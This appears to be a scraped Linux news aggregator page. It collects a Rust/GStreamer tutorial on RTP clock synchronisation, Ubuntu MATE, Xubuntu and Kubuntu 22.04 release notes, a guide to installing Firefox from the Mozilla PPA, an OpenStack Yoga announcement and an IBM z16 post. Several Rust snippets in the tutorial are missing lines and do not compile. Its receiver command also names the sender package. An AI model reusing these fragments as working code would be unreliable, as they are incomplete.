The example code below will make use of the GStreamer RTSP Server library but can be applied to any kind of RTP workflow, including WebRTC, and are written in Rust but the same can also be achieved in any other language. The full code can be found in this repository.

And for reference, the merge requests to enable all this are [1], [2] and [3]. You probably don’t want to backport those to an older version of GStreamer though as there are dependencies on various other changes elsewhere. All of the following needs at least GStreamer from the git main branch as of today, or the upcoming 1.22 release.

Baseline Sender / Receiver Code

The starting point of the example code can be found here in the baseline branch. All the important steps are commented so it should be relatively self-explanatory.


The sender is starting an RTSP server on the local machine on port 8554 and provides a media with H264 video and Opus audio on the mount point /test. It can be started with

$ cargo run -p rtp-rapid-sync-example-send

After starting the server it can be accessed via GStreamer with e.g. gst-play-1.0 rtsp:// or similarly via VLC or any other software that supports RTSP.

This does not do anything special yet but lays the foundation for the following steps. It creates an RTSP server instance with a custom RTSP media factory, which in turn creates custom RTSP media instances. All this is not needed at this point yet but will allow for the necessary customization later.

One important aspect here is that the base time of the media’s pipeline is set to zero


This allows the timeoverlay element that is placed in the video part of the pipeline to render the clock time over the video frames. We’re going to use this later to confirm on the receiver that the clock time on the sender and the one retrieved on the receiver are the same.

let video_overlay = gst::ElementFactory::make("timeoverlay", None)
    .context("Creating timeoverlay")?;
video_overlay.set_property_from_str("time-mode", "running-time");

It actually only supports rendering the running time of each buffer, but in a live pipeline with the base time set to zero the running time and pipeline clock time are the same. See the documentation for some more details about the time concepts in GStreamer.

Overall this creates the following RTSP stream producer bin, which will be used also in all the following steps:


The receiver is a simple playbin pipeline that plays an RTSP URI given via command-line parameters and runs until the stream is finished or an error has happened.

It can be run with the following once the sender is started

$ cargo run -p rtp-rapid-sync-example-send -- "rtsp://"

Please don’t forget to replace the IP with the IP of the machine that is actually running the server.

All the code should be familiar to anyone who ever wrote a GStreamer application in Rust, except for one part that might need a bit more explanation

    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);

playbin is going to create an rtspsrc, and at that point it will emit the source-setup signal so that the application can do any additional configuration of the source element. Here we’re connecting a signal handler to that signal to do exactly that.

By default rtspsrc introduces a latency of 2 seconds of latency, which is a lot more than what is usually needed. For live, non-VOD RTSP streams this value should be around the network jitter and here we’re configuring that to 40 milliseconds.

Retrieval of absolute sender clock times

Now as the first step we’re going to retrieve the absolute sender clock times for each video frame on the receiver. They will be rendered by the receiver at the bottom of each video frame and will also be printed to stdout. The changes between the previous version of the code and this version can be seen here and the final code here in the sender-clock-time-retrieval branch.

When running the sender and receiver as before, the video from the receiver should look similar to the following

The upper time that is rendered on the video frames is rendered by the sender, the bottom time is rendered by the receiver and both should always be the same unless something is broken here. Both times are the pipeline clock time when the sender created/captured the video frame.

In this configuration the absolute clock times of the sender are provided to the receiver via the NTP / RTP timestamp mapping provided by the RTCP Sender Reports. That’s also the reason why it takes about 5s for the receiver to know the sender’s clock time as RTCP packets are not scheduled very often and only after about 5s by default. The RTCP interval can be configured on rtpbin together with many other things.


On the sender-side the configuration changes are rather small and not even absolutely necessary.

rtpbin.set_property_from_str("ntp-time-source", "clock-time");

By default the RTP NTP time used in the RTCP packets is based on the local machine’s walltime clock converted to the NTP epoch. While this works fine, this is not the clock that is used for synchronizing the media and as such there will be drift between the RTP timestamps of the media and the NTP time from the RTCP packets, which will be reset every time the receiver receives a new RTCP Sender Report from the sender.

Instead, we configure rtpbin here to use the pipeline clock as the source for the NTP timestamps used in the RTCP Sender Reports. This doesn’t give us (by default at least, see later) an actual NTP timestamp but it doesn’t have the drift problem mentioned before. Without further configuration, in this pipeline the used clock is the monotonic system clock.

rtpbin.set_property("rtcp-sync-send-time", false);

rtpbin normally uses the time when a packet is sent out for the NTP / RTP timestamp mapping in the RTCP Sender Reports. This is changed with this property to instead use the time when the video frame / audio sample was captured, i.e. it does not include all the latency introduced by encoding and other processing in the sender pipeline.

This doesn’t make any big difference in this scenario but usually one would be interested in the capture clock times and not the send clock times.


On the receiver-side there are a few more changes. First of all we have to opt-in to rtpjitterbuffer putting a reference timestamp metadata on every received packet with the sender’s absolute clock time.

    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
        source.set_property("add-reference-timestamp-meta", true);

rtpjitterbuffer will start putting the metadata on packets once it knows the NTP / RTP timestamp mapping, i.e. after the first RTCP Sender Report is received in this case. Between the Sender Reports it is going to interpolate the clock times. The normal timestamps (PTS) on each packet are not affected by this and are still based on whatever clock is used locally by the receiver for synchronization.

To actually make use of the reference timestamp metadata we add a timeoverlay element as video-filter on the receiver:

let timeoverlay =
    gst::ElementFactory::make("timeoverlay", None).context("Creating timeoverlay")?;

timeoverlay.set_property_from_str("time-mode", "reference-timestamp");
timeoverlay.set_property_from_str("valignment", "bottom");

pipeline.set_property("video-filter", &timeoverlay);

This will then render the sender’s absolute clock times at the bottom of each video frame, as seen in the screenshot above.

And last we also add a pad probe on the sink pad of the timeoverlay element to retrieve the reference timestamp metadata of each video frame and then printing the sender’s clock time to stdout:

let sinkpad = timeoverlay
    .expect("Failed to get timeoverlay sinkpad");
    .add_probe(gst::PadProbeType::BUFFER, |_pad, info| {
        if let Some(gst::PadProbeData::Buffer(ref buffer)) = info.data {
            if let Some(meta) = buffer.meta::<gst::ReferenceTimestampMeta>() {
                println!("Have sender clock time {}", meta.timestamp());
            } else {
                println!("Have no sender clock time");

    .expect("Failed to add pad probe");

Rapid synchronization via RTP header extensions

The main problem with the previous code is that the sender’s clock times are only known once the first RTCP Sender Report is received by the receiver. There are many ways to configure rtpbin to make this happen faster (e.g. by reducing the RTCP interval or by switching to the AVPF RTP profile) but in any case the information would be transmitted outside the actual media data flow and it can’t be guaranteed that it is actually known on the receiver from the very first received packet onwards. This is of course not a problem in every use-case, but for the cases where it is there is a solution for this problem.

RFC 6051 defines an RTP header extension that allows to transmit the NTP timestamp that corresponds an RTP packet directly together with this very packet. And that’s what the next changes to the code are making use of.

The changes between the previous version of the code and this version can be seen here and the final code here in the rapid-synchronization branch.


To add the header extension on the sender-side it is only necessary to add an instance of the corresponding header extension implementation to the payloaders.

let hdr_ext = gst_rtp::RTPHeaderExtension::create_from_uri(
    .context("Creating NTP 64-bit RTP header extension")?;
video_pay.emit_by_name::<()>("add-extension", &[&hdr_ext]);

This first instantiates the header extension based on the uniquely defined URI for it, then sets its ID to 1 (see RFC 5285) and then adds it to the video payloader. The same is then done for the audio payloader.

By default this will add the header extension to every RTP packet that has a different RTP timestamp than the previous one. In other words: on the first packet that corresponds to an audio or video frame. Via properties on the header extension this can be configured but generally the default should be sufficient.


On the receiver-side no changes would actually be necessary. The use of the header extension is signaled via the SDP (see RFC 5285) and it will be automatically made use of inside rtpbin as another source of NTP / RTP timestamp mappings in addition to the RTCP Sender Reports.

However, we configure one additional property on rtpbin

    glib::closure!(|_rtspsrc: &gst::Element, rtpbin: &gst::Element| {
        rtpbin.set_property("min-ts-offset", gst::ClockTime::from_mseconds(1));

Inter-stream audio/video synchronization

The reason for configuring the min-ts-offset property on the rtpbin is that the NTP / RTP timestamp mapping is not only used for providing the reference timestamp metadata but it is also used for inter-stream synchronization by default. That is, for getting correct audio / video synchronization.

With RTP alone there is no mechanism to synchronize multiple streams against each other as the packet’s RTP timestamps of different streams have no correlation to each other. This is not too much of a problem as usually the packets for audio and video are received approximately at the same time but there’s still some inaccuracy in there.

One approach to fix this is to use the NTP / RTP timestamp mapping for each stream, either from the RTCP Sender Reports or from the RTP header extension, and that’s what is made use of here. And because the mapping is provided very often via the RTP header extension but the RTP timestamps are only accurate up to clock rate (1/90000s for video and 1/48000s) for audio in this case, we configure a threshold of 1ms for adjusting the inter-stream synchronization. Without this it would be adjusted almost continuously by a very small amount back and forth.

Other approaches for inter-stream synchronization are provided by RTSP itself before streaming starts (via the RTP-Info header), but due to a bug this is currently not made use of by GStreamer.

Yet another approach would be via the clock information provided by RFC 7273, about which I already wrote previously and which is also supported by GStreamer. This also allows inter-device, network synchronization and used for that purpose as part of e.g. AES67, Ravenna, SMPTE 2022 / 2110 and many other protocols.

Inter-device network synchronization

Now for the last part, we’re going to add actual inter-device synchronization to this example. The changes between the previous version of the code and this version can be seen here and the final code here in the network-sync branch. This does not use the clock information provided via RFC 7273 (which would be another option) but uses the same NTP / RTP timestamp mapping that was discussed above.

When starting the receiver multiple times on different (or the same) machines, each of them should play back the media synchronized to each other and exactly 2 seconds after the corresponding audio / video frames are produced on the sender.

For this, both sender and all receivers are using an NTP clock (pool.ntp.org in this case) instead of the local monotonic system clock for media synchronization (i.e. as the pipeline clock). Instead of an NTP clock it would also be possible to any other mechanism for network clock synchronization, e.g. PTP or the GStreamer netclock.

println!("Syncing to NTP clock");
    .context("Syncing NTP clock")?;
println!("Synced to NTP clock");

This code instantiates a GStreamer NTP clock and then synchronously waits up to 5 seconds for it to synchronize. If that fails then the application simply exits with an error.


On the sender side all that is needed is to configure the RTSP media factory, and as such the pipeline used inside it, to use the NTP clock


This causes all media inside the sender’s pipeline to be synchronized according to this NTP clock and to also use it for the NTP timestamps in the RTCP Sender Reports and the RTP header extension.


On the receiver side the same has to happen


In addition a couple more settings have to be configured on the receiver though. First of all we configure a static latency of 2 seconds on the receiver’s pipeline.


This is necessary as GStreamer can’t know the latency of every receiver (e.g. different decoders might be used), and also because the sender latency can’t be automatically known. Each audio / video frame will be timestamped on the receiver with the NTP timestamp when it was captured / created, but since then all the latency of the sender, the network and the receiver pipeline has passed and for this some compensation must happen.

Which value to use here depends a lot on the overall setup, but 2 seconds is a (very) safe guess in this case. The value only has to be larger than the sum of sender, network and receiver latency and in the end has the effect that the receiver is showing the media exactly that much later than the sender has produced it.

And last we also have to tell rtpbin that

  1. sender and receiver clock are synchronized to each other, i.e. in this case both are using exactly the same NTP clock, and that no translation to the pipeline’s clock is necessary, and
  2. that the outgoing timestamps on the receiver should be exactly the sender timestamps and that this conversion should happen based on the NTP / RTP timestamp mapping

source.set_property_from_str("buffer-mode", "synced");
source.set_property("ntp-sync", true);

And that’s it.

A careful reader will also have noticed that all of the above would also work without the RTP header extension, but then the receivers would only be synchronized once the first RTCP Sender Report is received. That’s what the test-netclock.c / test-netclock-client.c example from the GStreamer RTSP server is doing.

As usual with RTP, the above is by far not the only way of doing this and GStreamer also supports various other synchronization mechanisms. Which one is the correct one for a specific use-case depends on a lot of factors.

on May 02, 2022 01:00 PM

April 26, 2022

Ubuntu MATE 22.04 LTS is the culmination of 2 years of continual improvement 😅 to Ubuntu and MATE Desktop. As is tradition, the LTS development cycle has a keen focus on eliminating paper 🧻 cuts 🔪 but we’ve jammed in some new features and a fresh coat of paint too 🖌 The following is a summary of what’s new since Ubuntu MATE 21.10 and some reminders of how we got here from 20.04. Read on to learn more 🧑‍🎓

Thank you! 🙇

I’d like to extend my sincere thanks to everyone who has played an active role in improving Ubuntu MATE for this LTS release 👏 From reporting bugs, submitting translations, providing patches, contributing to our crowd funding, developing new features, creating artwork, offering community support, actively testing and providing QA feedback to writing documentation or creating this fabulous website. Thank you! Thank you all for getting out there and making a difference! 💚

Ubuntu MATE 22.04 LTS Ubuntu MATE 22.04 LTS (Jammy Jellyfish) - Mutiny layout with Yark-MATE-dark

What’s changed?

Here are the highlights of what’s changed recently.

MATE Desktop 1.26.1 🧉

Ubuntu MATE 22.04 features MATE Desktop 1.26.1. MATE Desktop 1.26.0 was introduced in 21.10 and benefits from significant effort 😅 in fixing bugs 🐛 in MATE Desktop, optimising performance ⚡ and plugging memory leaks. MATE Desktop 1.26.1 addresses the bugs we discovered following the initial 1.26.0 release. Our community also fixed some bugs in Plank and Brisk Menu 👍 and also fixed the screen reader during installs for visually impaired users 🥰 In all over 500 bugs have been addressed in this release 🩹

Yaru 🎨

Ubuntu MATE 21.04 was the first release to ship with a MATE variant of the Yaru theme. A year later and we’ve been working hard with members of the Yaru and Ubuntu Desktop teams to bring full MATE compatibility to upstream Yaru, including all the accent colour varieties. All reported bugs 🐞 in the Yaru implementation for MATE have also been fixed 🛠

Yaru Themes Yaru Themes in Ubuntu MATE 22.04 LTS

Ubuntu MATE 22.04 LTS ships with all the Yaru themes, including our own “chelsea cucumber” version 🥒 The legacy Ambiant/Radiant themes are no longer installed by default and neither are the stock MATE Desktop themes. We’ve added an automatic settings migration to transition users who upgrade to an appropriate Yaru MATE theme.

Cherries on top 🍒

In collaboration with Paul Kepinski 🇫🇷 (Yaru team) and Marco Trevisan 🇮🇹 (Ubuntu Desktop team) we’ve added dark/light panels and panel icons to Yaru for MATE Desktop and Unity. I’ve added a collection of new dark/light panel icons to Yaru for popular apps with indicators such as Steam, Dropbox, uLauncher, RedShift, Transmission, Variety, etc.

Light Panel Dark Panel Light and Dark panels

I’ve added patches 🩹 to the Appearance Control Center that applies theme changes to Plank (the dock), Pluma (text editor) and correctly toggles the colour scheme preference for GNOME 42 apps. When you choose a dark theme, everything will go dark in unison 🥷 and vice versa.

So, Ubuntu MATE 22.04 LTS is now using everything Yaru/Suru has to offer. 🎉

AI Generated wallpapers

My friend Simon Butcher 🇬🇧 is Head of Research Platforms at Queen Mary University of London managing the Apocrita HPC cluster service. He’s been creating AI 🤖 generated art using bleeding edge CLIP guided diffusion models 🖌 The results are pretty incredible and we’ve included the 3 top voted “Jammy Jellyfish” in our wallpaper selection as their vivid and vibrant styles compliment the Yaru accent colour theme options very nicely indeed 😎

If you want the complete set, here’s a tarball of all 8 wallpapers at 3840x2160:

Ubuntu MATE stuff 🧉

Ubuntu MATE has a few distinctive apps and integrations of it’s own, here’s a run down of what’s new and shiny ✨

MATE Tweak

Switching layouts with MATE Tweak is its most celebrated feature. We’ve improved the reliability of desktop layout switching and restoring custom layouts is now 100% accurate 💯

Ubuntu MATE Desktop Layouts Having your desktop your way in Ubuntu MATE

We’ve removed mate-netbook from the default installation of Ubuntu MATE and as a result the Netbook layout is no longer available. We did this because mate-maximus, a component of mate-netbook, is the cause of some compatibility issues with client side decorated (CSD) windows. There are still several panel layouts that offer efficient resolution use 📐 for those who need it.

MATE Tweak has refreshed its supported for 3rd party compositors. Support for Compton has been dropped, as it is no longer actively maintained and comprehensive support for picom has been added. picom has three compositor options: Xrender, GLX and Hybrid. All three are can be selected via MATE Tweak as the performance and compatibility of each varies depending on your hardware. Some people choose to use picom because they get better gaming performance or screen tearing is reduced. Some just like subtle animation effects picom adds 💖


Recent versions of rofi, the tool used by MATE HUD to visualise menu searches, has a new theme system. MATE HUD has been updated to support this new theme engine and comes with two MATE specific themes (mate-hud and mate-hud-rounded) that automatically adapt to match the currently selected GTK theme.

You can add your own rofi themes to ~/.local/share/rofi/themes. Should you want to, you can use any rofi theme in MATE HUD. Use Alt + F2 to run rofi-theme-selector to try out the different themes, and if there is one you prefer you can set it as default by using running the following in a terminal:

gsettings set org.mate.hud rofi-theme <theme name>

MATE HUD MATE HUD uses the new rofi theme engine

Windows & Shadows

I’ve updated the Metacity/Marco (the MATE Window Manager) themes in Yaru to make sure they match GNOME/CSD/Handy windows for a consistent look and feel across all window types 🪟 and 3rd party compositors like picom. I even patched how Marco and picom render shadows so windows they look cohesive regardless of toolkit or compositor being used.

Ubuntu MATE Welcome & Boutique

The Software Boutqiue has been restocked with software for 22.04 and Firefox 🔥🦊 ESR (.deb) has been added to the Browser Ballot in Ubuntu MATE Welcome.

Ubuntu MATE Welcome Browser Ballot Comprehensive browser options just a click away

41% less fat 🍩

Ubuntu MATE, like it’s lead developer, was starting to get a bit large around the mid section 😊 During the development of 22.04, the image 📀 got to 4.1GB 😮

So, we put Ubuntu MATE on a strict diet 🥗 We’ve removed the proprietary NVIDIA drivers from the local apt pool on the install media and thanks to migrating fully to Yaru (which now features excellent de-duplication of icons) and also removing our legacy themes/icons. And now the Yaru-MATE themes/icons are completely in upstream Yaru, we were able to remove 3 snaps from the default install and the image is now a much more reasonable 2.7GB; 41% smaller. 🗜

This is important to us, because the majority of our users are in countries where Internet bandwidth is not always plentiful. Those of you with NVIDIA GPUs, don’t worry. If you tick the 3rd party software and drivers during the install the appropriate driver for your GPU will be downloaded and installed 👍

Install 3rd party drivers NVIDIA GPU owners should tick Install 3rd party software and drivers during install

While investigating 🕵 a bug in Xorg Server that caused Marco (the MATE window manager) to crash we discovered that Marco has lower frame time latency ⏱ when using Xrender with the NVIDIA proprietary drivers. We’ve published a PPA where NVIDIA GPU users can install a version of Marco that uses Xpresent for optimal performance

sudo apt-add-repository ppa:ubuntu-mate-dev/marco
sudo apt upgrade

Should you want to revert this change you install ppa-purge and run the following from a terminal: sudo ppa-purge -o ubuntu-mate-dev -p marco.

But wait! There’s more! 😲

These reductions in size are after we added three new applications to the default install on Ubuntu MATE: GNOME Clocks, Maps and Weather My family and I 👨‍👩‍👧 have found these applications particularly useful and use them regularly on our laptops without having to reach for a phone or tablet.

GNOME Clocks, Maps & Weather New additions to the default desktop application in Ubuntu MATE 22.04 LTS

For those of you who like a minimal base platform, then the minimal install option is still available which delivers just the essential Ubuntu MATE Desktop and Firefox browser. You can then build up from there 👷

Packages, packages, packages 📦

It doesn’t matter how you like to consume your Linux 🐧 packages, Ubuntu MATE has got you covered with PPA, Snap, AppImage and FlatPak support baked in by default. You’ll find flatpak, snapd and xdg-desktop-portal-gtk to support Snap and FlatPak and the (ageing) libfuse2 to support AppImage are all pre-installed.

Although flatpak is installed, FlatHub is not enabled by default. To enable FlatHub run the following in a terminal:

flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo

We’ve also included snapd-desktop-integration which provides a bridge between the user’s session and snapd to integrate theme preferences 🎨 with snapped apps and can also automatically install snapped themes 👔 All the Yaru themes shipped in Ubuntu MATE are fully snap aware.

Ayatana Indicators

Ubuntu MATE 20.10 transitioned to Ayatana Indicators 🚥 As a quick refresher, Ayatana Indicators are a fork of Ubuntu Indicators that aim to be cross-distro compatible and re-usable for any desktop environment 👌

Ubuntu MATE 22.04 LTS comes with Ayatana Indicators 22.2.0 and sees the return of Messages Indicator 📬 to the default install. Ayatana Indicators now provide improved backwards compatibility to Ubuntu Indicators and no longer requires the installation of two sets of libraries, saving RAM, CPU cycles and improving battery endurance 🔋

Ayatana Indicator Settings Ayatana Indicators Settings

To compliment the BlueZ 5.64 protocol stack in Ubuntu, Ubuntu MATE ships Blueman 2.2.4 which offers comprehensive management of Bluetooth devices and much improved pairing compatibility 💙🦷

I also patched mate-power-manager, ayatana-indicator-power and Yaru to add support for battery powered gaming input devices, such as controllers 🎮 and joysticks 🕹

Active Directory

And in case you missed it, the Ubuntu Desktop team added the option to enroll your computer into an Active Directory domain 🔑 during install. Ubuntu MATE has supported the same capability since it was first made available in the 20.10 release.

Raspberry Pi image 🥧

  • Should be available very shortly after the release of 22.04.

Major Applications

Accompanying MATE Desktop 1.26.1 and Linux 5.15 are Firefox 99.0, Celluloid 0.20, Evolution 3.44 & LibreOffice

See the Ubuntu 22.04 Release Notes for details of all the changes and improvements that Ubuntu MATE benefits from.

Download Ubuntu MATE 22.04 LTS

This new release will be first available for PC/Mac users.


Upgrading from Ubuntu MATE 20.04 LTS and 21.10

You can upgrade to Ubuntu MATE 22.04 LTS from Ubuntu MATE either 20.04 LTS or 21.10. Ensure that you have all updates installed for your current version of Ubuntu MATE before you upgrade.

  • Open the “Software & Updates” from the Control Center.
  • Select the 3rd Tab called “Updates”.
  • Set the “Notify me of a new Ubuntu version” drop down menu to “For long-term support versions” if you are using 20.04 LTS; set it to “For any new version” if you are using 21.10.
  • Press Alt+F2 and type in update-manager -c -d into the command box.
  • Update Manager should open up and tell you: New distribution release ‘XX.XX’ is available.
    • If not, you can use /usr/lib/ubuntu-release-upgrader/check-new-release-gtk
  • Click “Upgrade” and follow the on-screen instructions.

There are no offline upgrade options for Ubuntu MATE. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Known Issues

Here are the known issues.

Component Problem Workarounds Upstream Links
Ubuntu Ubiquity slide shows are missing for OEM installs of Ubuntu MATE


Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 26, 2022 04:47 PM

April 23, 2022

It is now widely known that Ubuntu 22.04 LTS (Jammy Jellyfish) ships Firefox as a snap, but some people (like me) may prefer installing it from .deb packages to retain control over upgrades or to keep extensions working.

Luckily there is still a PPA serving firefox (and thunderbird) debs at https://launchpad.net/~mozillateam/+archive/ubuntu/ppa maintained by the Mozilla Team. (Thank you!)

You can block the Ubuntu archive’s version that just pulls in the snap by pinning it:

$ cat /etc/apt/preferences.d/firefox-no-snap 
Package: firefox*
Pin: release o=Ubuntu*
Pin-Priority: -1

Now you can remove the transitional package and the Firefox snap itself:

sudo apt purge firefox
sudo snap remove firefox
sudo add-apt-repository ppa:mozillateam/ppa
sudo apt update
sudo apt install firefox

Since the package comes from a PPA unattended-upgrades will not upgrade it automatically, unless you enable this origin:

echo 'Unattended-Upgrade::Allowed-Origins:: "LP-PPA-mozillateam:${distro_codename}";' | sudo tee /etc/apt/apt.conf.d/51unattended-upgrades-firefox

Happy browsing!

Update: I have found a few other, similar guides at https://fostips.com/ubuntu-21-10-two-firefox-remove-snap and https://ubuntuhandbook.org/index.php/2022/04/install-firefox-deb-ubuntu-22-04 and I’ve updated the pinning configuration based on them.

on April 23, 2022 02:38 PM

April 21, 2022

The Xubuntu team is happy to announce the immediate release of Xubuntu 22.04.

Xubuntu 22.04, codenamed Jammy Jellyfish, is a long-term support (LTS) release and will be supported for 3 years, until 2025.

The Xubuntu and Xfce development teams have made great strides in usability, expanded features, and additional applications in the last two years. Users coming from 20.04 will be delighted with improvements found in Xfce 4.16 and our expanded application set. 21.10 users will appreciate the added stability that comes from the numerous maintenance releases that landed this cycle.

The final release images are available as torrents and direct downloads from xubuntu.org/download/.

As the main server might be busy in the first few days after the release, we recommend using the torrents if possible.

Xubuntu Core, our minimal ISO edition, is available to download from unit193.net/xubuntu/core/ [torrent]. Find out more about Xubuntu Core here.

We’d like to thank everybody who contributed to this release of Xubuntu!

Highlights and Known Issues


  • Mousepad 0.5.8, our text editor, broadens its feature set with the addition of session backup and restore, plugin support, and a new gspell plugin.
  • Ristretto 0.12.2, the versatile image viewer, improves thumbnail support and features numerous performance improvements.
  • Whisker Menu Plugin 2.7.1 expands customization options with several new preferences and CSS classes for theme developers.
  • Firefox is now included as a Snap package.
  • Refreshed user documentation, available on the ISO and online.
  • Six new wallpapers from the 22.04 Community Wallpaper Contest.

Known Issues

  • The shutdown prompt may not be displayed at the end of the installation. Instead you might just see a Xubuntu logo, a black screen with an underscore in the upper left hand corner, or just a black screen. Press Enter and the system will reboot into the installed environment. (LP: #1944519)
  • The Firefox Snap is not currently able to open the locally-installed Xubuntu Docs. (LP: #1967109)

For more obscure known issues, information on affecting bugs, bug fixes, and a list of new package versions, please refer to the Xubuntu Release Notes.

The main Ubuntu Release Notes cover many of the other packages we carry and more generic issues.


For support with the release, navigate to Help & Support for a complete list of methods to get help.

on April 21, 2022 10:44 PM

The Xubuntu team is happy to announce the results of the 22.04 community wallpaper contest!

As always, we’d like to send out a huge thanks to every contestant. The Xubuntu Community Wallpaper Contest gives us a unique chance to interact with the community and get contributions from members who may otherwise not have had the opportunity to join in before. With around 130 submissions, the contest garnered less interest this time around, but we still had a lot of great work to pick from. All of the submissions are browsable on the 22.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

From left to right, top to bottom. Click on the links for full-size image versions.

Congratulations, and thanks for your wonderful contributions!

on April 21, 2022 10:21 PM

E191 Podcast Wacom Portugal

Podcast Ubuntu Portugal

Dali, leia-se Diogo, foi – para variar – às compras, com o objectivo de se dotar de ferramentas criativas. O quadrado do Carrondo, viu nesse acto uma perspectiva mais técnica. Numa semana em que a Vodafone volta à conversa e as migrações também, desta feita de WordPress para Hugo, ou simples HTML…
Já sabem: oiçam, subscrevam e partilhem!

* https://gitlab.com/podcastubuntuportugal
* https://gitlab.com/podcastubuntuportugal/website
* https://gitlab.com/podcastubuntuportugal/magia
* https://wordpress.org/plugins/simply-static/
* https://downdetector.pt/
* https://shop.nitrokey.com/shop/product/nk-pro-2-nitrokey-pro-2-3?aff_ref=3
* https://shop.nitrokey.com/shop?aff_ref=3
* https://youtube.com/PodcastUbuntuPortugal

### Apoios
Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.
Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

### Atribuição e licenças
Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo [Senhor Podcast](https://senhorpodcast.pt/).
O website é produzido por Tiago Carrondo e o [código aberto](https://gitlab.com/podcastubuntuportugal/website) está licenciado nos termos da [Licença MIT](https://gitlab.com/podcastubuntuportugal/website/main/LICENSE).
A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da [CC0 1.0 Universal License](https://creativecommons.org/publicdomain/zero/1.0/).
Este episódio e a imagem utilizada estão licenciados nos termos da licença: [Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)](https://creativecommons.org/licenses/by-nc-nd/4.0/), [cujo texto integral pode ser lido aqui](https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode). Estamos abertos a licenciar para permitir outros tipos de utilização, [contactem-nos](https://podcastubuntuportugal.org/contactos) para validação e autorização.

on April 21, 2022 10:03 PM

Kubuntu 22.04 LTS Released

Kubuntu General News

The Kubuntu Team is happy to announce that Kubuntu 22.04 LTS has been released, featuring the beautiful KDE Plasma 5.24 LTS: simple by default, powerful when needed.

Codenamed “Jammy Jellyfish”, Kubuntu 22.04 continues our tradition of giving you Friendly Computing by integrating the latest and greatest Free Software technologies into a high-quality, easy-to-use Linux distribution.

The team has been hard at work through this cycle, introducing new features and fixing bugs.

Under the hood, there have been updates to many core packages, including a new 5.15-based kernel, KDE Frameworks 5.92, Plasma 5.24 LTS and KDE Gear (formerly Applications) 21.12.3.

Kubuntu has seen many updates for other applications, both in our default install, and installable from the Ubuntu archive.

Elisa, KDE connect, Krita, Kdevelop, Digikam, Latte-dock, and many many more applications are updated.

Applications that are key for day-to-day usage are included and updated, such as Firefox, VLC and Libreoffice.

For this release we provide Thunderbird for email support, however the KDE PIM suite (including kontact and kmail) is still available to install from the archive.

For a list of other application updates, upgrading notes and known bugs be sure to read our release notes.

Download 22.04 LTS or read how to upgrade from 21.10 and 20.04.

Note: From 21.10, there may a delay of a few hrs to days between the official release announcements and the Ubuntu Release Team enabling upgrades. From 20.04, upgrades will not be enabled until approximately the date of the 1st 22.04 point release (22.04.1) at the end of July.

on April 21, 2022 06:24 PM

The Ubuntu OpenStack team at Canonical is pleased to announce the general
availability of OpenStack Yoga on Ubuntu 22.04 LTS (Jammy Jellyfish) and
Ubuntu 20.04 LTS (Focal Fossa) via the Ubuntu Cloud Archive. Details of
the Yoga release can be found at: https://www.openstack.org/software/yoga

To get access to the Ubuntu Yoga packages:

Ubuntu 22.04 LTS

OpenStack Yoga is available by default on Ubuntu 22.04.

Ubuntu 20.04 LTS

The Ubuntu Cloud Archive for OpenStack Yoga can be enabled on Ubuntu
20.04 by running the following command:

sudo add-apt-repository cloud-archive:yoga

The Ubuntu Cloud Archive for Yoga includes updates for:

aodh, barbican, ceilometer, ceph (17.1.0), cinder, designate,
designate-dashboard, dpdk (21.11), glance, gnocchi, heat,
heat-dashboard, horizon, ironic, ironic-ui, keystone, libvirt (8.0.0),
magnum, magnum-ui, manila, manila-ui, masakari, mistral, murano,
murano-dashboard, networking-arista, networking-bagpipe,
networking-baremetal, networking-bgpvpn, networking-hyperv,
networking-l2gw, networking-mlnx, networking-odl, networking-sfc,
neutron, neutron-dynamic-routing, neutron-fwaas, neutron-vpnaas, nova,
octavia, octavia-dashboard, openstack-trove, openvswitch (2.17.0),
ovn (22.03.0), ovn-octavia-provider, placement, sahara,
sahara-dashboard, senlin, swift, trove-dashboard, vmware-nsx,
vitrage, watcher, watcher-dashboard, zaqar, and zaqar-ui.

For a full list of packages and versions, please refer to:

Reporting bugs

If you have any issues please report bugs using the ‘ubuntu-bug’ tool to
ensure that bugs get logged in the right place in Launchpad:

sudo ubuntu-bug nova-conductor

Thank you to everyone who contributed to OpenStack Yoga!

(on behalf of the Ubuntu OpenStack Engineering team)

on April 21, 2022 06:03 PM

A jellyfish and a mainframe

Elizabeth K. Joseph

Happy Ubuntu 22.04 LTS (Jammy Jellyfish) release day!

April has been an exciting month. On April 5th, the IBM z16 was released. For those of you who aren’t aware, this is the IBM zSystems class of mainframes that I’ve been working on at IBM for the past three years. As a Developer Advocate, I’ve been able to spend a lot of time digging into the internals, learning about the implementation of DevOps practices and incorporation of Linux into environments, and so much more. I’ve also had the opportunity to work with dozens of open source projects in the Linux world as they get their software to run on the s390x architecture. This includes working with several Linux distributions, and most recently forming the Open Mainframe Project Linux Distributions Working Group with openSUSE’s Sarah Julia Kriesch.

As a result, I’m delighted to continue to spend a little time with Ubuntu!

For the Ubuntu 22.04 release, the team at Canonical has already been working hard to incorporate key features of the IBM z16, which Frank Heimes has gone into detail about on a technical level on the Ubuntu on Big Iron Blog, IBM z16 launches with Ubuntu 22.04 (beta) support, and also over on Ubuntu.com with IBM z16 is here, and Ubuntu 22.04 LTS beta is ready. Finally, Frank published: Ubuntu 22.04 LTS got released

Indeed, timing was fortuitous, as Frank notes:

